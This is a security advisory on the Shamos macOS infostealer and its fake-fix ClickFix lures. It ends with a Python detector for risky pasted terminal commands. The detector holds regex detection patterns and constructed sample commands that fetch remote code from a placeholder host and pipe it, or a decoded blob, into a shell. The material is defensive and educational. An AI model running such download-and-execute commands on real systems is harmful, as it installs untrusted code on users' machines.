Fake Mac fixes trick users into installing new Shamos infostealer

What’s new

A new infostealer malware named ‘Shamos’ is targeting Mac devices through ClickFix attacks, which impersonate troubleshooting guides. Developed by the cybercriminal group “COOKIE SPIDER,” Shamos is a variant of the Atomic macOS Stealer (AMOS) and is designed to steal sensitive data from web browsers, Keychain items, Apple Notes, and cryptocurrency wallets. The malware has attempted infections in over 300 environments since June 2025.

Who’s affected

Mac users who encounter malvertising or fake GitHub repositories that prompt them to execute shell commands in the macOS Terminal are at risk. These commands are disguised as fixes for common macOS issues but actually download and execute the Shamos malware.

What to do

  • Do not execute commands found online unless you fully understand their function.
  • Avoid clicking on sponsored search results for macOS help; instead, use the Apple Community forums or the built-in Help feature.
  • Educate users about the risks of ClickFix attacks and the importance of verifying the source of troubleshooting guides.
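
To support the first and third points, here is an added example (not from the original article): a Python triage function that flags terminal one-liners with the download-and-execute shape described under "Who's affected". The rule names, regexes and sample commands are constructed for illustration and are generic heuristics; the article does not reproduce the actual Shamos command.

```python
import re

# Generic download-and-execute shapes (assumptions for illustration); the
# article does not reproduce the actual Shamos command.
FETCH = r"(?:curl|wget)\b[^|;&]*"           # fetch tool plus its arguments
SHELL = r"(?:\S*/)?(?:ba|z|da|k)?sh\b"      # sh, bash, zsh, ... with optional path
TO_SHELL = rf"\|\s*(?:sudo\s+)?{SHELL}"     # "| bash", "| sudo /bin/zsh", ...

RULES = {
    # Remote content streamed straight into an interpreter.
    "fetch_piped_to_shell": re.compile(rf"\b{FETCH}{TO_SHELL}"),
    # Interpreter asked to run the text of a command substitution that fetches.
    "shell_runs_fetched_text": re.compile(
        rf"\b{SHELL}\s+-c\s+[\"']?\$\(\s*{FETCH}\)"),
    # Encoded text decoded and streamed into an interpreter, which hides
    # what will run from the person pasting it.
    "decoded_blob_piped_to_shell": re.compile(
        rf"\bbase64\s+(?:-d|-D|--decode)\b[^|;&]*{TO_SHELL}"),
    # File downloaded and immediately made executable.
    "fetch_then_chmod_exec": re.compile(
        rf"\b{FETCH}(?:&&|;)\s*chmod\s+\+x\b"),
}


def triage_command(cmd: str) -> list[str]:
    """Return the name of every rule that the pasted command matches."""
    # Join backslash-continued lines and collapse whitespace so a command
    # split over several lines is judged as the single line the shell sees.
    flat = " ".join(cmd.replace("\\\n", " ").split())
    return [name for name, rx in RULES.items() if rx.search(flat)]


if __name__ == "__main__":
    samples = [  # constructed commands, not taken from any real campaign
        "curl -fsSL https://example.invalid/fix.sh | bash",
        '/bin/bash -c "$(curl -fsSL https://example.invalid/fix.sh)"',
        "echo 'ZWNobyBoaQ==' | base64 -d | sudo zsh",
        "curl -o /tmp/fix https://example.invalid/fix && chmod +x /tmp/fix",
        "curl -s https://example.invalid/status.json | jq .",
        "softwareupdate --list",
    ]
    for s in samples:
        print(triage_command(s) or "no match", "<-", s)
```

A match means the command runs content that cannot be read before it executes; an empty result does not mean the command is safe, since the rules cover only these four shapes.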
